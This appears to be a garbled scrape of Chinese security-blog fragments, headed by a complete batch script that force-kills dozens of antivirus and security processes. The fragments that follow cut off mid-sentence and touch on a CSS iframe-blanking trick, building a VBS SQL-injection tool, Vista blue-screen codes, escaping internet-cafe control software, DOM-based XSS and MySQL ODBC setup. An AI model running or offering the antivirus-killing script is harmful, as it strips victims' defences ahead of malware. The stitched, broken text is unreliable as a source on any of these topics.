@echo off
:k
Set p=taskkill /f /im /t
sc config winmgmt start= AUTO & net start winmgmt
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% SmartUp*
%p% FileDsty*
%p% RegClean*
%p% 360tray*
%p% 360safe*
%p% kabaload*
%p% safelive*
%p% KASTask*
%p% kpFW32*
%p% kpFW32X*
%p% KvXP_1*
%p% KVMonXP_1*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*

因为FF(Firefox)不怕IFRAME，于是就拿IE开刀，不知道比尔有没有奖发。我只写了一句代码，就搞定了，哈，痛快。就是IE only（特有的）的CSS中的属性e­xpression，插进去试试，果然那些IFRAME不起作用了。

代码如下：

<style type="text/css" media="all" id="http://safe3.cn">
/*<![CDATA[*/
iframe{
       v:e­xpression(this.src='about:blank',this.outerHTML='');/

平常我们遇到有注入漏洞一类的网站大部分人都是用NBSI or 阿D一类的注射工具。但有的站点的注射点很难构造，或者说注射语句比较特殊。如果用手工去注射的话，费时又费力！但自己写针对性的工具的话，对一些刚入门不久或不会编程的朋友来说，实在是一件很痛苦的事情。因此今天NP给大家带来的文章就是讲如何用简单的VBS脚本来打造我们所要的注射工具。
在您继续看这篇文章之前，我先大胆的假设此时的您已经学会了VBS脚本的基础知识以及基本的SQL Inject知识。
首先，我们先来看一段有漏洞的代码。(此代码摘自“网趣网上购物

Vista蓝屏已不是一个新鲜的话题了!面对蓝屏的一大堆英文，有时简直会令人不知所措!今天大家就看看我们整理的蓝屏代码含义和解决方案。

　　1、0x0000000A:IRQL_NOT_LESS_OR_EQUAL

　　错误分析:主要是由问题的驱动程序、有缺陷或不兼容的硬件与软件造成的. 从技术角度讲. 表明在内核模式中存在以太高的进程内部请求级别(IRQL)访问其没有权限访问的内存地址.◇解决方案:请用前面介绍的解决方案中的2、3、5、8、9方案尝试排除.

　　2、0x00000012:TRAP_CAUSE_UNKNOWN

　　错误分析:如果遇到这个

前面我们讲了如何使用“任务管理器”解除美萍的控制，但此方法在某些时候却行不同！为此，笔者将教给大家另一种方式，即修改注册表！虽然此方法在部分网站上也有暴光，但总体上来说解释的却不怎么全面、详细！更不要提每一步所代表的意义了！

美萍电脑安全卫士（简称

很牛的文章!所以粘了过来.

by Superhei
http://www.ph4nt0m.org
2007-11-01

现在xss非常流行.而且跑xss的工具到处都是,导致就和sqlinj一样,很多大站 基本很难找到很明显的xss bug了,以往我们查找xss 一般都黑盒,而且效果很明显,对于白盒,一般都是基于Server language如[php/asp/jsp ....]查找变量输出语句如:print/echo ....等.

今天刚看看大牛Amit Klein在2005写[DOM Based Cross Site Scripting or XSS of the Third Kind]:http://www.webappsec.org/projects/articles/071105.html 提到的DO

　　回来就要写点有技术含量的东西．一段vbs代码．

一、先安装mysql-connector-odbc-3.51.15-win32.msi。

二、是在ODBC数据源中建立一个DSN。具体方法是：
1、打开控制面板中的ODBD数据源；
2、选择系统DSN，添加一个新的DSN驱动程序；
3、选择MyODBD，出现一个对话框供输入MySQL：

（1）Windows DSN name：所要建立DSN的名称；
（2）MySQL Host (name or ip)：MySQL服务器的名称或IP地址。一般填LocalHost ；
（3） MySQL database name：需要使用数据库的名称。
三、代码